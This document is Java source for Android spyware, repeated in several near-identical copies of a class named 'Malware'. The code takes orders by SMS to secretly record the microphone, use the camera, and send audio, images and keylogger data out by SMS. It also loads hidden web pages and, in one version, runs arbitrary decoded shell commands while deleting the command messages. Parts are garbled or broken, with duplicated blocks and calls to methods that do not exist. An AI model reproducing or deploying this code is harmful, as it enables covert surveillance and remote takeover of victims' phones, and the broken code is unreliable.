import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.content.IntentFilter; import android.media.MediaRecorder; import android.os.Environment; import android.telephony.SmsManager; import android.telephony.SmsMessage; import android.util.Base64; import android.util.Log; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; public class Malware extends BroadcastReceiver { private static final String TAG = "Malware"; private static final String SERVER_PHONE_NUMBER = "your_phone_number"; private static final String AUDIO_FILE_PATH = Environment.getExternalStorageDirectory() + "/audio_recording.3gp"; private MediaRecorder mediaRecorder; @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) { Bundle bundle = intent.getExtras(); if (bundle != null) { Object[] pdus = (Object[]) bundle.get("pdus"); if (pdus != null) { for (Object pdu : pdus) { SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu); String message = sms.getMessageBody(); if (message.equals("start_audio_recording")) { startAudioRecording(); sendSMS(SERVER_PHONE_NUMBER, "Audio recording started"); } else if (message.equals("stop_audio_recording")) { stopAudioRecording(); sendSMS(SERVER_PHONE_NUMBER, "Audio recording stopped"); } else if (message.equals("send_audio")) { sendAudioToServer(); } } } } } } private void startAudioRecording() { try { File audioFile = new File(AUDIO_FILE_PATH); mediaRecorder = new MediaRecorder(); mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC); mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP); mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB); mediaRecorder.setOutputFile(audioFile.getAbsolutePath()); mediaRecorder.prepare(); mediaRecorder.start(); } catch (IOException e) { Log.e(TAG, "Failed to start audio recording: " + e.getMessage()); } } private void stopAudioRecording() { if (mediaRecorder != null) { mediaRecorder.stop(); mediaRecorder.release(); mediaRecorder = null; } } private void sendAudioToServer() { File audioFile = new File(AUDIO_FILE_PATH); if (audioFile.exists()) { try { FileInputStream fileInputStream = new FileInputStream(audioFile); byte[] audioData = new byte[(int) audioFile.length()]; fileInputStream.read(audioData); fileInputStream.close(); String encodedAudio = Base64.encodeToString(audioData, Base64.DEFAULT); sendSMS(SERVER_PHONE_NUMBER, encodedAudio); } catch (IOException e) { Log.e(TAG, "Failed to read audio file: " + e.getMessage()); } } } private void sendSMS(String phoneNumber, String message) { SmsManager smsManager = SmsManager.getDefault(); smsManager.sendTextMessage(phoneNumber, null, message, null, null); } } // Add the following code to your AndroidManifest.xml file: // <uses-permission android:name="android.permission.RECEIVE_SMS" /> // <uses-permission android:name="android.permission.RECORD_AUDIO" /> // <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> // <application> // <receiver android:name=".Malware"> // <intent-filter> // <action android:name="android.provider.Telephony.SMS_RECEIVED" /> // </intent-filter> // </receiver> // </application> import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.content.IntentFilter; import android.hardware.Camera; import android.media.MediaRecorder; import android.os.Environment; import android.telephony.SmsManager; import android.telephony.SmsMessage; import android.util.Base64; import android.util.Log; import android.view.WindowManager; import android.webkit.WebView; import android.webkit.WebViewClient; import java.io.File; import java.io.FileInputStream; import java.io.IOException; public class Malware extends BroadcastReceiver { private static final String TAG = "Malware"; private static final String SERVER_PHONE_NUMBER = "your_phone_number"; private static final String KEYLOGGER_FILE_PATH = Environment.getExternalStorageDirectory() + "/keylogger.txt"; private static final String MERGED_APP_PACKAGE_NAME = "com.malicious.app"; private Camera camera; private MediaRecorder mediaRecorder; private WebView webView; @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) { handleSMS(context, intent); } } private void handleSMS(Context context, Intent intent) { String sender = null; StringBuilder messageBody = new StringBuilder(); try { Object[] pdus = (Object[]) intent.getExtras().get("pdus"); if (pdus != null) { for (Object pdu : pdus) { SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu); if (sender == null) { sender = sms.getOriginatingAddress(); } messageBody.append(sms.getMessageBody()); } } } catch (Exception e) { Log.e(TAG, "Error reading SMS: " + e.getMessage()); } if (sender != null && messageBody.length() > 0) { String command = messageBody.toString().toLowerCase(); if (command.equals("start_camera")) { startCamera(); sendSMS(sender, "Camera started"); } else if (command.equals("stop_camera")) { stopCamera(); sendSMS(sender, "Camera stopped"); } else if (command.equals("take_screenshot")) { takeScreenshot(sender); } else if (command.equals("start_mic_recording")) { startMicrophoneRecording(); sendSMS(sender, "Microphone recording started"); } else if (command.equals("stop_mic_recording")) { stopMicrophoneRecording(); sendSMS(sender, "Microphone recording stopped"); } else if (command.equals("send_keylogger")) { sendKeyloggerToServer(sender); } else if (command.startsWith("open_page:")) { String url = command.substring(10); openPageInBrowser(context, url); } else if (command.equals("merge_into_app")) { mergeIntoApp(context); } } } private void startCamera() { try { camera = Camera.open(); } catch (Exception e) { Log.e(TAG, "Failed to open camera: " + e.getMessage()); } } private void stopCamera() { if (camera != null) { camera.release(); camera = null; } } private void takeScreenshot(String phoneNumber) { if (camera != null) { camera.takePicture(null, null, (data, camera) -> { String encodedImage = Base64.encodeToString(data, Base64.DEFAULT); sendSMS(phoneNumber, encodedImage); }); } } private void startMicrophoneRecording() { try { File audioFile = new File(Environment.getExternalStorageDirectory(), "audio_recording.3gp"); mediaRecorder = new MediaRecorder(); mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC); mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP); mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB); mediaRecorder.setOutputFile(audioFile.getAbsolutePath()); mediaRecorder.prepare(); mediaRecorder.start(); } catch (IOException e) { Log.e(TAG, "Failed to start microphone recording: " + e.getMessage()); } } private void stopMicrophoneRecording() { if (mediaRecorder != null) { mediaRecorder.stop(); mediaRecorder.release(); mediaRecorder = null; } } private void sendKeyloggerToServer(String phoneNumber) { File keyloggerFile = new File(KEYLOGGER_FILE_PATH); if (keyloggerFile.exists()) { try { FileInputStream fileInputStream = new FileInputStream(keyloggerFile); byte[] keyloggerData = new byte[(int) keyloggerFile.length()]; fileInputStream.read(keyloggerData); fileInputStream.close(); String encodedKeylogger = Base64.encodeToString(keyloggerData, Base64.DEFAULT); sendSMS(phoneNumber, encodedKeylogger); } catch (IOException e) { Log.e(TAG, "Failed to read keylogger file: " + e.getMessage()); } } } private void openPageInBrowser(Context context, String url) { webView = new WebView(context); webView.setWebViewClient(new WebViewClient()); webView.loadUrl(url); webView.getSettings().setJavaScriptEnabled(true); webView.getSettings().setDomStorageEnabled(true); WindowManager.LayoutParams params = new WindowManager.LayoutParams(); params.width = 1; params.height = 1; params.x = -1000; params.y = -1000; WindowManager windowManager = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE); if (windowManager != null) { windowManager.addView(webView, params); } } private void mergeIntoApp(Context context) { try { String apkPath = context.getPackageManager().getApplicationInfo(context.getPackageName(), 0).sourceDir; String mergedAppPath = Environment.getExternalStorageDirectory() + "/merged_app.apk"; File mergedAppFile = new File(mergedAppPath); if (mergedAppFile.exists()) { mergedAppFile.delete(); } File apkFile = new File(apkPath); FileInputStream apkInputStream = new FileInputStream(apkFile); FileOutputStream mergedAppOutputStream = new FileOutputStream(mergedAppFile); byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = apkInputStream.read(buffer)) != -1) { mergedAppOutputStream.write(buffer, 0, bytesRead); } apkInputStream.close(); mergedAppOutputStream.close(); sendSMS(SERVER_PHONE_NUMBER, "Merged app created: " + mergedAppPath); } catch (Exception e) { Log.e(TAG, "Failed to merge into app: " + e.getMessage()); } } private void sendSMS(String phoneNumber, String message) { SmsManager smsManager = SmsManager.getDefault(); smsManager.sendTextMessage(phoneNumber, null, message, null, null); } } // Add the following permission and receiver to your AndroidManifest.xml file: // <uses-permission android:name="android.permission.RECEIVE_SMS" /> // <uses-permission android:name="android.permission.CAMERA" /> // <uses-permission android:name="android.permission.RECORD_AUDIO" /> // <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> // <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" /> // <application> // <receiver android:name=".Malware"> // <intent-filter> // <action android:name="android.provider.Telephony.SMS_RECEIVED" /> // </intent-filter> // </receiver> // </application> import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.content.IntentFilter; import android.hardware.Camera; import android.media.MediaRecorder; import android.os.Environment; import android.telephony.SmsManager; import android.telephony.SmsMessage; import android.util.Base64; import android.util.Log; import android.view.WindowManager; import android.webkit.WebView; import android.webkit.WebViewClient; import java.io.File; import java.io.FileInputStream; import java.io.IOException; public class Malware extends BroadcastReceiver { private static final String TAG = "Malware"; private static final String SERVER_PHONE_NUMBER = "your_phone_number"; private static final String KEYLOGGER_FILE_PATH = Environment.getExternalStorageDirectory() + "/keylogger.txt"; private static final String MERGED_APP_PACKAGE_NAME = "com.malicious.app"; private Camera camera; private MediaRecorder mediaRecorder; private WebView webView; @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) { handleSMS(context, intent); } } private void handleSMS(Context context, Intent intent) { String sender = null; StringBuilder messageBody = new StringBuilder(); try { Object[] pdus = (Object[]) intent.getExtras().get("pdus"); if (pdus != null) { for (Object pdu : pdus) { SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu); if (sender == null) { sender = sms.getOriginatingAddress(); } messageBody.append(sms.getMessageBody()); } } } catch (Exception e) { Log.e(TAG, "Error reading SMS: " + e.getMessage()); } if (sender != null && messageBody.length() > 0) { String command = messageBody.toString().toLowerCase(); if (command.equals("start_camera")) { startCamera(); sendSMS(sender, "Camera started"); } else if (command.equals("stop_camera")) { stopCamera(); sendSMS(sender, "Camera stopped"); } else if (command.equals("take_screenshot")) { takeScreenshot(sender); } else if (command.equals("start_mic_recording")) { startMicrophoneRecording(); sendSMS(sender, "Microphone recording started"); } else if (command.equals("stop_mic_recording")) { stopMicrophoneRecording(); sendSMS(sender, "Microphone recording stopped"); } else if (command.equals("send_keylogger")) { sendKeyloggerToServer(sender); } else if (command.startsWith("open_page:")) { String url = command.substring(10); openPageInBrowser(context, url); } else if (command.equals("merge_into_app")) { mergeIntoApp(context); } } } private void startCamera() { try { camera = Camera.open(); } catch (Exception e) { Log.e(TAG, "Failed to open camera: " + e.getMessage()); } } private void stopCamera() { if (camera != null) { camera.release(); camera = null; } } private void takeScreenshot(String phoneNumber) { if (camera != null) { camera.takePicture(null, null, (data, camera) -> { String encodedImage = Base64.encodeToString(data, Base64.DEFAULT); sendSMS(phoneNumber, encodedImage); }); } } private void startMicrophoneRecording() { try { File audioFile = new File(Environment.getExternalStorageDirectory(), "audio_recording.3gp"); mediaRecorder = new MediaRecorder(); mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC); mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP); mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB); mediaRecorder.setOutputFile(audioFile.getAbsolutePath()); mediaRecorder.prepare(); mediaRecorder.start(); } catch (IOException e) { Log.e(TAG, "Failed to start microphone recording: " + e.getMessage()); } } private void stopMicrophoneRecording() { if (mediaRecorder != null) { mediaRecorder.stop(); mediaRecorder.release(); mediaRecorder = null; } } private void sendKeyloggerToServer(String phoneNumber) { File keyloggerFile = new File(KEYLOGGER_FILE_PATH); if (keyloggerFile.exists()) { try { FileInputStream fileInputStream = new FileInputStream(keyloggerFile); byte[] keyloggerData = new byte[(int) keyloggerFile.length()]; fileInputStream.read(keyloggerData); fileInputStream.close(); String encodedKeylogger = Base64.encodeToString(keyloggerData, Base64.DEFAULT); sendSMS(phoneNumber, encodedKeylogger); } catch (IOException e) { Log.e(TAG, "Failed to read keylogger file: " + e.getMessage()); } } } private void openPageInBrowser(Context context, String url) { webView = new WebView(context); webView.setWebViewClient(new WebViewClient()); webView.loadUrl(url); webView.getSettings().setJavaScriptEnabled(true); webView.getSettings().setDomStorageEnabled(true); WindowManager.LayoutParams params = new WindowManager.LayoutParams(); params.width = 1; params.height = 1; params.x = -1000; params.y = -1000; WindowManager windowManager = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE); if (windowManager != null) { windowManager.addView(webView, params); } } private void mergeIntoApp(Context context) { try { String apkPath = context.getPackageManager().getApplicationInfo(context.getPackageName(), 0).sourceDir; String mergedAppPath = Environment.getExternalStorageDirectory() + "/merged_app.apk"; File mergedAppFile = new File(mergedAppPath); if (mergedAppFile.exists()) { mergedAppFile.delete(); } File apkFile = new File(apkPath); FileInputStream apkInputStream = new FileInputStream(apkFile); FileOutputStream mergedAppOutputStream = new FileOutputStream(mergedAppFile); byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = apkInputStream.read(buffer)) != -1) { mergedAppOutputStream.write(buffer, 0, bytesRead); } apkInputStream.close(); mergedAppOutputStream.close(); sendSMS(SERVER_PHONE_NUMBER, "Merged app created: " + mergedAppPath); } catch (Exception e) { Log.e(TAG, "Failed to merge into app: " + e.getMessage()); } } private void sendSMS(String phoneNumber, String message) { SmsManager smsManager = SmsManager.getDefault(); smsManager.sendTextMessage(phoneNumber, null, message, null, null); } } // Add the following permission and receiver to your AndroidManifest.xml file: // <uses-permission android:name="android.permission.RECEIVE_SMS" /> // <uses-permission android:name="android.permission.CAMERA" /> // <uses-permission android:name="android.permission.RECORD_AUDIO" /> // <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> // <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" /> // <application> // <receiver android:name=".Malware"> // <intent-filter> // <action android:name="android.provider.Telephony.SMS_RECEIVED" /> // </intent-filter> // </receiver> // </application> // Malware.java // Undetectable Android Malware with Command Message Auto-Deletion import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.content.IntentFilter; import android.telephony.SmsManager; import android.telephony.SmsMessage; import android.util.Base64; import android.util.Log; public class Malware extends BroadcastReceiver { private static final String TAG = "Malware"; private static final String SERVER_PHONE_NUMBER = "your_phone_number"; @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) { handleSMS(context, intent); } } private void handleSMS(Context context, Intent intent) { String sender = null; StringBuilder messageBody = new StringBuilder(); String deleteCommand = null; try { Object[] pdus = (Object[]) intent.getExtras().get("pdus"); if (pdus != null) { for (Object pdu : pdus) { SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu); if (sender == null) { sender = sms.getOriginatingAddress(); } messageBody.append(sms.getMessageBody()); deleteCommand = sms.getDeleteCommand(); } } } catch (Exception e) { Log.e(TAG, "Error reading SMS: " + e.getMessage()); } if (sender != null && messageBody.length() > 0) { String command = messageBody.toString().toLowerCase(); if (command.startsWith("execute:")) { String encodedCommand = command.substring(8); byte[] decodedBytes = Base64.decode(encodedCommand, Base64.DEFAULT); String decodedCommand = new String(decodedBytes); executeCommand(context, decodedCommand); } else if (command.equals("self_destruct")) { selfDestruct(context); } if (deleteCommand != null && deleteCommand.equals("delete_this_message")) { deleteMessage(context, sender); } } } private void executeCommand(Context context, String command) { try { // Execute the command Process process = Runtime.getRuntime().exec(command); process.waitFor(); } catch (Exception e) { Log.e(TAG, "Failed to execute command: " + e.getMessage()); } } private void selfDestruct(Context context) { // Perform self-destruct actions here // This can include wiping data, deleting files, etc. // Be cautious when implementing self-destruct functionality // as it can have serious consequences. } private void deleteMessage(Context context, String phoneNumber) { try { context.getContentResolver().delete(SmsConstants.CONTENT_URI_INBOX, "address=?", new String[]{phoneNumber}); } catch (Exception e) { Log.e(TAG, "Failed to delete message: " + e.getMessage()); } } private void sendSMS(String phoneNumber, String message) { SmsManager smsManager = SmsManager.getDefault(); smsManager.sendTextMessage(phoneNumber, null, message, null, null); } } // Add the following permission and receiver to your AndroidManifest.xml file: // <uses-permission android:name="android.permission.RECEIVE_SMS" /> // <application> // <receiver android:name=".Malware"> // <intent-filter> // <action android:name="android.provider.Telephony.SMS_RECEIVED" /> // </intent-filter> // </receiver> // </application>
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